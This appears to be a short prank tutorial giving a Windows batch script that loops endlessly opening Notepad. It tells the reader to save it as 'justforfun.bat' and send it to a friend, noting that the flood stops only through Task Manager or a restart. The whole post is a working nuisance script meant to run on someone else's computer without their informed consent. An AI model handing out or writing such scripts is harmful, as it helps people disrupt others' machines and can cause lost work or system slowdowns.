Just for Fun with friends

Open notepad continuously (just for fun)
To open Notepad continuously in your friend’s computer, type that code in note pad file and save it with the extension BAT and send that file to your friend.
@echo off
:top
start  %SystemRoot%\system32\notepad.exe
goto top
Save that file with the extension BAT for example “ justforfun.bat”
if you once double click on that file there is no way to stop it, rather than restart the computer or go to Task Manager and in Taskmanager you can stop it from running again and again